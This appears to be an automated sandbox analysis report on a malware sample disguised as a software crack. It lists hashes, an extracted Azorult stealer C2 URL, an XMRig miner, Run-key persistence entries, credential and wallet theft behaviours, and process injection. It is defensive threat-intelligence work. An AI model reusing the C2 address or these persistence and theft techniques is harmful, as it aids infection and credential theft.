Analysis
-
max time kernel
1575s -
max time network
1800s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
02-04-2021 13:29
Static task
static1
Behavioral task
behavioral1
Sample
DBF.Viewer.Pro.3.11.crack.by.F4CG.exe
Resource
win10v20201028
Behavioral task
behavioral2
Sample
DBF.Viewer.Pro.3.11.crack.by.F4CG.exe
Resource
win10v20201028
Behavioral task
behavioral3
Sample
DBF.Viewer.Pro.3.11.crack.by.F4CG.exe
Resource
win10v20201028
Behavioral task
behavioral4
Sample
DBF.Viewer.Pro.3.11.crack.by.F4CG.exe
Resource
win10v20201028
Behavioral task
behavioral5
Sample
DBF.Viewer.Pro.3.11.crack.by.F4CG.exe
Resource
win7v20201028
General
-
Target
DBF.Viewer.Pro.3.11.crack.by.F4CG.exe
-
Size
4.8MB
-
MD5
98e0552e7c661d3f84c5ca691bb58b60
-
SHA1
f8747cbd9256e9587e45b1feeded6b082b098e5d
-
SHA256
23e30d6f1d505e6a0cf1672ec7420d28af81975a9832f1af2eae8a3233a09eb4
-
SHA512
d767b09e6d24ce96ce95e7cbcb248b93373f7dcbad3a96ba249a3c54df9511567c4ff2bfd8393492a0f90ae8bf5ab37c1cf71f75092ad81dde7a7a7a5f7e76da
Malware Config
Extracted
azorult
http://kvaka.li/1210776429.php
Signatures
-
Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
-
XMRig Miner Payload 4 IoCs
resource yara_rule behavioral4/memory/5000-89-0x0000000140000000-0x000000014070A000-memory.dmp xmrig behavioral4/memory/5000-90-0x00000001402CA898-mapping.dmp xmrig behavioral4/memory/5000-93-0x0000000140000000-0x000000014070A000-memory.dmp xmrig behavioral4/memory/5000-94-0x0000000140000000-0x000000014070A000-memory.dmp xmrig -
Blocklisted process makes network request 1 IoCs
flow pid Process 67 5000 msiexec.exe -
Executes dropped EXE 30 IoCs
pid Process 4068 keygen-pr.exe 4044 keygen-step-1.exe 2056 keygen-step-3.exe 4512 keygen-step-4.exe 1460 key.exe 1768 Setup.exe 4640 setups.exe 4256 askinstall20.exe 188 setups.tmp 1240 file.exe 4440 7758.tmp.exe 1908 77E6.tmp.exe 2264 7893.tmp.exe 2432 md2_2efs.exe 4652 7758.tmp.exe 5116 BTRSetp.exe 4744 8441342.exe 4740 5684678.exe 3640 8568804.exe 3860 2928718.exe 3144 5342057.exe 4024 gcttt.exe 372 Windows Host.exe 216 jfiag3g_gg.exe 4620 jfiag3g_gg.exe 2668 8568804.exe 4796 8568804.exe 4716 2928718.exe 1800 jfiag3g_gg.exe 96 jfiag3g_gg.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Control Panel\International\Geo\Nation setups.tmp -
Loads dropped DLL 7 IoCs
pid Process 188 setups.tmp 188 setups.tmp 188 setups.tmp 188 setups.tmp 188 setups.tmp 188 setups.tmp 188 setups.tmp -
Reads local data of messenger clients 2 TTPs
Infostealers often target stored data of messaging applications, which can include saved credentials and account information.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 4 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 77E6.tmp.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Windows\CurrentVersion\Run\wwwupdat3 = "C:\\Users\\Admin\\AppData\\Roaming\\wwwupdat3.exe" 77E6.tmp.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Windows\CurrentVersion\Run\Windows Host = "C:\\ProgramData\\Windows Host\\Windows Host.exe" 5684678.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\haleng = "C:\\Users\\Admin\\AppData\\Local\\Temp\\haleng.exe" gcttt.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA md2_2efs.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 62 api.ipify.org 119 ip-api.com -
Suspicious use of SetThreadContext 5 IoCs
description pid Process procid_target PID 4440 set thread context of 4652 4440 7758.tmp.exe 108 PID 1908 set thread context of 4676 1908 77E6.tmp.exe 110 PID 1908 set thread context of 5000 1908 77E6.tmp.exe 113 PID 3640 set thread context of 4796 3640 8568804.exe 133 PID 3860 set thread context of 4716 3860 2928718.exe 134 -
Drops file in Windows directory 3 IoCs
description ioc Process File opened for modification C:\Windows\Debug\ESE.TXT MicrosoftEdge.exe File opened for modification C:\Windows\Debug\ESE.TXT MicrosoftEdge.exe File opened for modification C:\Windows\Debug\ESE.TXT MicrosoftEdge.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 7758.tmp.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString 7758.tmp.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 4408 timeout.exe -
Kills process with taskkill 1 IoCs
pid Process 1080 taskkill.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Main MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Main browser_broker.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Main MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Main browser_broker.exe -
Modifies registry class 64 IoCs
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\communication.netflowcorp. = "0" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\netflowcorp.com\NumberOfSubdo = "32" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\priority.netflowcorp.com MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\report.netflowcorp.com MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\OnlineHistory\NextBrowserDataLogTime = 20c46e1ef727d701 MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\TrustedPeople MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\Active\{865D534D-CD06-44B9-88E0-4AA53530AE39} = "0" MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DataStore\LastCleanup = 0000000000000000 MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\Extensible Cache MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 75056e1fc627d701 MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 066e8685c727d701 MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\CIStatus\CIPolicyState = "0" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\click.netflowcorp.com MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\declaration.netflowcorp.com\ = "0" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\netflowcorp.com\NumberOfSubdo = "7" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\netflowcorp.com\NumberOfSubdo = "24" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\24.netflowcorp.com\ = "0" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\onlinecasinoground.nl\NumberO = "1" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\trust\CRLs MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\ACGStatus MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\communication.netflowcorp.com = "0" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\traction.netflowcorp.com\ = "0" MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 59b460dbc427d701 MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\Root MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\directive.netflowcorp.com\ = "0" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\late.netflowcorp.com MicrosoftEdgeCP.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\Content\CachePrefix MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\Total\ = "0" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\netflowcorp.com\NumberOfSubdo = "15" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\PrivacyAdvanced = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-DeviceId = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\netflowcorp.com\NumberOfSubdo = "28" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\IECompatVersionHigh = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\netflowcorp.com\NumberOfSubdo = "37" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\IECompatVersionLow = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\critical.netflowcorp.com MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000e1bf2d221871814ba0ecf7de67e0d509000000000200000000001066000000010000200000005f864e42adafc2098ca286e79a8c06cb8e9f85926da656620e83b04af311edbd000000000e800000000200002000000081fdeb155fe84c9de43ac4a76ef75b5e4bceb3aef12e7749953d9a58cfdfafc9400d0000980ad75ba28a6f466b51a0082a7f9eb9d6afa88f948c4e050895c1e3af14c42a1dab0cdbd07bd1ae6e1549057d0da90e405fb394708b27226d21be4aab810d306c38477de0bfce603e3b8de5376fdce6f511272e641bde05941e35c837fe40861ec218c71445c26328364d90a01a05b259c45d9afd3d901fc03b8553d62e4764e1cda66ee4f65af40bcb922bbd89dc7af189e0f6eafe7f51777e4eb5256a2e2a670604348e1b9613aedac22b94c6856ec794f42a3226980e80485daebaac43ca7c3c7426104c48b9275fcb877bf9c666ac6548d2a30cb4e5ad467b06daabaf4a5f1bfbba5695d47bd4cf3b75a3c2f8efd3c084c8ca7ef90f0cab56d95fefc096b057b8aa017fed13bf1704b37f33e6dfac710be9ef624d3fd3bd365c75b2701ccd0b63cf752813ae07b7a0ca38f23b862297708937361438f48820a207fe948b167719a04f68fa679ae6f3a07b513387eb57d213d24f2dde520806398f7fe80d75c5adfe071914ce5380fc2b58ae69296428eb18126e2f5ba8f97b2827eeb2844f3844cb526a31f2e64fd5b9f5c9edc99653884819b2fa5d12d770791d202693034a6b46741ea6a98deea95d5d00605e1403b40f24a5e64f0137c6a529f7bf1ccf369bad01023ccedb93fb62abde87d9ced39e2afefbc1f5d431e94f5d2992e82fe8bd42d817cd1f58f094a4628b809fc36711a8a8f3378f46e3c96fad736fc3d27d741e4d79c55b30270286aeba24c6a78e0bd1d78e3fc64b5be5b1c636fafcd320657b22721bc7daf96469bfd5fbd847d2baa28d98113f6660d729ace0531593d99bbdb6bc50d6296e62d626a0e05e6abe912c1efd10b90ecf53cc85cb7ed10e7c813e42f030722ff0c1deaf0ed65ee3f547f8ec1a477aa21fc6161a0999f1553c3504880395591e097b46c405f92428b7d60968c24b21a4560dbe1950383c1b5b43c84d2b8f32114cf7946b6f09180bf2248612c3b2b50761405fbebca0e2b2f5788ae9bbddec4f02c3c655eaf7db36273ba0d977ddb3e40390189bb818ca27359d109603e57e6967c74368f64a7510b4d10d6257ce09c3dc91d8582bdcfb5f9a463e0f5a1a2ddadecdfb443214bc0b8241f8f6269c2427373b4c77ddd4992c5fdbc9fa26196ce23122efbd12aff7ae1065e96a12f094dbe284404462d5a9f3c55a96eaed0450913fc94480e0c4597aac25ef782cdf0345776167aee8bdf3eae96ffa2ac5ccceed8ef14b0d2043473a73739c78638e52962bb1801e36cbfcdfd8bd53fc3942b0440495f499aca4a7665c0c563c688ee2d1369f1a49bc98b16a1593187b4859ce15c375c34dcbca1d8490915df29f389cd9d4039c04c54542f86a378da5e65312e86303a5affc6fceb05ec86ebf2aa4481f3d835faa90c1fa76d10703bb35df3d300a345504cb9d907f874d85bc63e72ab9ff6176289b2f21eb0e1ffddc904ab2b7c334875787039f656f6f327d7bcb4c3fd2452e04b6c2bee39b3d4e11e7eb67288e93e2857984bbf9e09f0564da2c24cdf493927e0cb8d6549677a9e2570dec5dace774bfcf9e8e5ba6e88cee0473fc0fcfc97d91e1f0df6929639a06d37cd21ce728b519c5ddd5391bc6b73abdede13e6c2ee73f3e213468b3a868750e30e9fc030b7bdfdf69b76c1bbfc90f02235dff8dcac91e51873c1883ea5a238c68e767f9bd328978b3600323be4f5195f64607eee026eb2063061f8db7c006e61d78a270468d45cd25b1d543a1f49fc8ced6e726af1ac7e6d094a2e02a0d10fe4cc1a2c0e3ea64ff51e9cc4dc31286b9c52042a42b08af7c5b9c918809c041189a3bbde13ff8227de1b130f89826a815447c2ddf25915436d42f194510205ef0ae341f5bfee7d9d413f0c26415d815ae2fedf424242c5b15807812c9bcd2845f5d4bc857f2e1658d670e1be38444eb41445e2d8c5ebeb63d6c86fdae6eb34b2b1d6c8e9af9eecbd4a45f58ea4221584f184cea786f13234e28d0679b24486cc43a8c65c7888185043f2ab96ef0305d782b0e47826028a38d3e767f6e78a17df4e9eec3b705954202f317ef7078d8707b7460f2bc83eccbec0df682bc74011998282f52bca30b69b6c22292ad57aa6eb01e1a0a886655c8260b05f76808623f9f37642c984663b3e39fb6f021f14d9cc9e10f235a1e32fca6e9919adc6365ce5dcba7b9c8a0545e211560ed341695a02cc159144bc5ce2642885a49b8cdc12c7243c23aaa809ef8859fd82697894343baab3c4e00fa9f30e5bdbc1e9fcfbbd4bdc74a54ab3dd519950d7142b2f02eaeab471c5de78631a5bceba42d87b62b0c0805e19750dcc3fe5ad80d5aec407383994ba015a24b1bf802e67f7bbdda401e5035de267d75eb893ee148212aea27402e69480c40be564214f1c95fc0adb7733a58b4aa9b926b5acc7750b1b74b7c06ea73e4d6fb6d75a2ee8a1102bd290ee56f2424c4dd6ccd2493c6b411bcc61fb59f4f89f5e9853d1765acc529e4bfa727e6b646a9d2d25d9929ade4fe61f588fca769ab123fc18be0626047df43de8352e76afe08b0b557573e98ebdaedef9686e51aa0f0a8a14d22e0980db16a0029d1ccd4215fd53f73c894d68b858efb1df6aa11cc94204e24c2989e7c75ce854ab15e529ea493944c7e8a18ae437d43a342ee6ee8eb4368750c3ce97ace409500a514a9c85123f29ddfbf92c4e3f5ee1255008335e422d031c3d9ef2c498c785dec208d6ec55ae7765aca61fce64920a32988183379d4a7296816762112d848e52cc9429ab19070342ea2cdf110d036b59fbce21eb4cf86b3a3cb82039a7b47ee3e611fbeba4c3149008fcb2cb3f8508a36f07e749f78eee0a5efec1eda3ddd880f125f35d173bf1ce0cd363e2e683578c6fb6197db05c2d54a7b7c0f83d2cd9dd19cb2b0a975f61658ced5ce6b92a0b5f38f9df861f3aa5d08746e6a1b726590a3542a4487ccf85537dc619c6fb1dd89974c7b5032a1cbc331968d8a6165d5b2c21f78d5041520e2d52e6c329d35238cdc61fcc406fa0f0411707c9dc2eb7c1b2607cfb89bda63a3bf1beabcf5cbf877ff2a330b31ab17247c35132cd29a5471acd81a14af957dd9e5e8d694e6940054466e2dd7e6cdb76647060289f4507f45b2186e6350a13bb677ea00f55a12f8f07d445d80030fc8382bca2143a9d3c1fd5a5d0d948158e7b91c2921434cd0b8be7015c2a7a30fc7f2dfe1979c5518565d14acab064c80d9bfaa025a001f444f459862f7423aa3c4c9b21b9f5af59fb43253675ae1ecfb62497fc54beebb19181ea450f6700e50f421802afd168564477c3b8872ac911ce73d772575a1cdafdbb9adc39a022b41099e5f7dc6d12dc69083573b1be2d508f38c19d5f1e38fc314b64898dbf88917bf350bf247b229279d44d470f5f7d64215052f35154b5cbb072c3855cff515ed69b068246d84caf0b6c25fa0f32c2f2b135a3083c701fc2341d0036b70472ebd623606616c02342abb46c0b7044c0d528f9ea0a1a0bb3066ee2f84123e57190677f743dc75c31398a2880c57363abf8ca8eb7a19fb9d3dcc014611471ab4239428bc152a865180bb5e9c44154f07b6e891e203891bf49d38a9488c6230211b83fe6074b3a42b45a2ccd19c1d0cb0ebc8fdc90509d5491d1af7a0a7a9f9f7b62d41f0697764f78b353c4d783c5322487cc5c21bd9d4eaefc02ac572a6bf066cb342c3c6836a8097bf5c345f458472d6186d132e659dc0641bd56d44c390354a68fe5406c9a72348f4a0416f60250265a1b7846d48c67a9d024c1073c84148462d43ef064c1ac267aa171e86c0edad07ea3dabe52b18edccdf67b965b1ed4f4f3f5e3f838cd08e9dc70da3cc744e23f6c7a75761e3c314b54b02ad9ec5c07fc02eecc637a77b965dea97147149aebd2b1b77476dfd93765093ec06db35d482fe5aad8c726ba3a33805ce143425a60653b81897aa7a599cab34a93e77aecbd4fad630762bd92d6aa704721aace1909e3df20e84ccd6e4f506add9e7f1ea81c1a0e9302cbfe99af043ea7eabfc3c86b2aa68f03b04140325b3ad76999a54ea68a931c91b486002fb9e6577371f3c2fa40eece3a7d35783c3e65c27ab95d5ffa40ccdf25807902fec00eba7663f2a73f497e2518b61c44d55f51081717ad42c281fb20f1567b8795111f293e2e2ecc5f27208adaa458d0e3dddd48606f2437f9168a8efebce648e344292c699715b5a9f86306dc7b14114fc1a008bdbf3414bd9b4d4f4f97378d90e5c54a08c2498e5d2be9df56f6b5ad2122d94f4139a7bdc13a222830977c225c77261d1c93b21d538c7a8f8a24c8eb862630d441d6a107d7c2f9b7e755161e05ce6e059ba21064b23e6c8e1b1d19270b02d5863a4987b8fbad03d329ab8c8e531fda4cabe8029bd5d9295fb8e64ad4c92186f9684ffb3c5fd275b06fde732d831d1492be79ae90da1a005edd778921f142e58a1107272553c48111cb4f37569e8f444f4857017749a513a46eba17b002cbfa5b2eed877333044514c6ebf1a006d4329a4ea7a154d4ca186fdeab2072ebe3bb1cb0a00790785a1b5105c8642b9a73e8cde49ad6aa2841b7e094b60c07723c2549dcdf1b7ebb11e8502e7b374cad4c4eebb92f9de6e2756f3e6ddffef118d125605e2ab8bff2ad0d6913466689d5e242c3adc07e0a87a512a06c0398b1d5e0b1d51c974b36dfa4e4d16e825c128512dae5d39c0daead46fabc1db9b1335d179699785d579e7d2e2165695ca3637d0027c89cf8df004326e6db32e82ab09b9104156966742c18c3941f10920968b1e400000008d9c37bc6fcd160c4682330f5497de64d513be23da96d4e5f04b6de4cc4a7e55d7f7bcb3ccab8810ebe84cdeb122bd26c47b96d7052cc5713c957e06b7c356e2 MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\HistoryJournalCertificate MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\feminine.netflowcorp.com\ = "0" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\netflowcorp.com\NumberOfSubdo = "91" 